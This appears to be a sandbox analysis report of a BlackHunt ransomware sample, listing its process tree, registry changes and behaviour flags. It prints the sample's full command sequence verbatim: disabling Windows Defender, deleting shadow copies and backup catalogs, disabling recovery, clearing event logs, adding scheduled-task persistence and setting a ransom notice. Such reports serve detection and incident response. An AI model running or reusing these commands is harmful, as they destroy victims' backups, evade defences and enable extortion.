b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 177 PID 3208 wrote to memory of 3088 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 79 PID 3208 wrote to memory of 3088 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 79 PID 1268 wrote to memory of 2240 1268 cmd.exe 96 PID 1268 wrote to memory of 2240 1268 cmd.exe 96 PID 3768 wrote to memory of 4708 3768 cmd.exe 81 PID 3768 wrote to memory of 4708 3768 cmd.exe 81 PID 3208 wrote to memory of 2688 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 80 PID 3208 wrote to memory of 2688 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 80 PID 3208 wrote to memory of 3992 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 84 PID 3208 wrote to memory of 3992 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 84 PID 4376 wrote to memory of 2524 4376 cmd.exe 86 PID 4376 wrote to memory of 2524 4376 cmd.exe 86 PID 1716 wrote to memory of 916 1716 cmd.exe 175 PID 1716 wrote to memory of 916 1716 cmd.exe 175 PID 3208 wrote to memory of 3308 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 174 PID 3208 wrote to memory of 3308 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 174 PID 3588 wrote to memory of 2332 3588 cmd.exe 173 PID 3588 wrote to memory of 2332 3588 cmd.exe 173 PID 4512 wrote to memory of 2908 4512 cmd.exe 172 PID 4512 wrote to memory of 2908 4512 cmd.exe 172 PID 3208 wrote to memory of 4664 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 170 PID 3208 wrote to memory of 4664 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 170 PID 3208 wrote to memory of 2152 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 87 PID 3208 wrote to memory of 2152 3208 b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe 87 PID 2936 wrote to memory of 1044 2936 cmd.exe 168 PID 2936 wrote to memory of 1044 2936 cmd.exe 168 PID 4764 wrote to memory of 2176 4764 cmd.exe 90 PID 4764 wrote to memory of 2176 4764 cmd.exe 90 PID 3088 wrote to memory of 4344 3088 cmd.exe 89 PID 3088 wrote to memory of 4344 3088 cmd.exe 89 PID 2688 wrote to memory of 1576 2688 cmd.exe 167 PID 2688 wrote to memory of 1576 2688 cmd.exe 167 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe"C:\Users\Admin\AppData\Local\Temp\b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3208 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4732 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3088 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:4344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:3992
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:3972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2152
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4312
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2580
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:3196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2404
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:5988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:916
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1928
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:3204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3488
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:8424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:5092
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:7204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:4996
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:7416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4424
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:6836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1584
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1668
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2640
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:3752
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe" /F2⤵PID:4616
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3792
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2996
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3732
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4000
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4660
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2264
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:3240
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4492
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4664
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3308
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3588
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4764
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2936
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1716
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3768
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:5076
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1268
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3708
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:1152
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:9316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:10576
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:5380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:11080
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:9012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:6404
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:8756
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:10588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:13536
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:10460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:3488
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:14588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:7328
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:11040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4380
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:14248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2140
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:11184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:14620
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:14428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:7952
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:6352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:7720
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:14116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:12272
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:14584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:11212
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:14576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:13788
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:14156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:516
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:14548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:13584
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:6936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:14412
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:14188
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe"2⤵PID:13984
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:10516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:12764 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:5912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5912 -s 14564⤵
- Program crash
PID:6276
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:14340
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:14180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:7048
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:10028
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:2972
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:4708
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵PID:2240
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:2176
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Modifies registry class
PID:2240
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:3196
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:4012
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:1716
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:916
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:3684
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6800
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7016
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\b043bf42ed3ff19a71120cc17e0b3765f1325924d0922a1578a3a865335659bd.exe" /F1⤵
- Creates scheduled task(s)
PID:4756
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:8284
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:7048
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:3096
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:888
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f1⤵PID:1152
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:4764
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:3452
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:3920
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7520
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:5224
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:2144
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:1044
-
